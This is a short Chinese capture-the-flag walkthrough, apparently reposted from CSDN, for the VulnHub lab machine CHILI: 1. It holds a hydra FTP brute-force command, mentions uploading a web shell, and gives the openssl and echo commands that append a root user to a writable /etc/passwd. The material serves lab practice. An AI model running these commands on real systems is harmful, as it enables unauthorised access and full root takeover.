VulnHub靶场之CHILI: 1

其他 2021-03-02 05:43:33 阅读次数: 0

VulnHub靶场之CHILI: 1

扫描IP以及端口：
在这里插入图片描述
访问80端口，一个小辣椒，目录扫描，啥都没有，只能从ftp下手了：

看了看hint，用chili当作用户名试试破解一下密码：

利用hydra破解ftp密码：

hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150

得到密码：
在这里插入图片描述

成功进入：
在这里插入图片描述
进入到/var/www/html下，.nano下可读可写：

上传shell文件，别忘了加权限chmod 777：

访问，监听：

就一个用户chili，，，内核也较新：

发现passwd可以写入：

直接利用kali的工具openssl：

openssl passwd -1 -salt shell 123

在这里插入图片描述
写入到passwd：

echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd

在这里插入图片描述
成功获取root权限，读取flag：

猜你喜欢

转载自blog.csdn.net/qq_42967398/article/details/108928297

VulnHub靶场之CHILI: 1

vulnhub靶场之 DC -1

VulnHub靶场之CEWLKID: 1

VulnHub靶场之FirstBlood：1

VulnHub靶场之Relevant: 1

VulnHub靶场之PRAYING: 1

Vulnhub靶场之DC-1

VulnHub之dc1靶场（3）

【VulnHub靶场】——MONEYBOX: 1

【vulnhub靶场】node 1

VulnHub之y0usef靶场（1）

VulnHub靶场学习：nezuko: 1

Vulnhub靶场——DC-1

vulnhub靶场 DC-1

VulnHub测试靶场DC-1

反弹连接vulnhub靶场breach1

渗透靶场——Vulnhub:MinUv1

vulnhub靶场实战：DC-1

VulnHub靶场之Lampiao

VulnHub靶场之Acid

2020-1-7:vulnhub靶场练习，64Base

2020-1-14:vulnhub靶场练习，Ganme of Thrones CTF

Vulnhub靶场Prime_Series_Level-1渗透

VulnHub靶场之FoxHole: 1.0.1

VulnHub靶场之Funbox: EasyEnum

VulnHub靶场之HA: NARAK

VulnHub靶场之sunset:noontide

VulnHub之GoldenEye靶场（2）

VulnHub靶场之HA: FORENSICS

vulnhub之GoldenEye-v1靶机

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)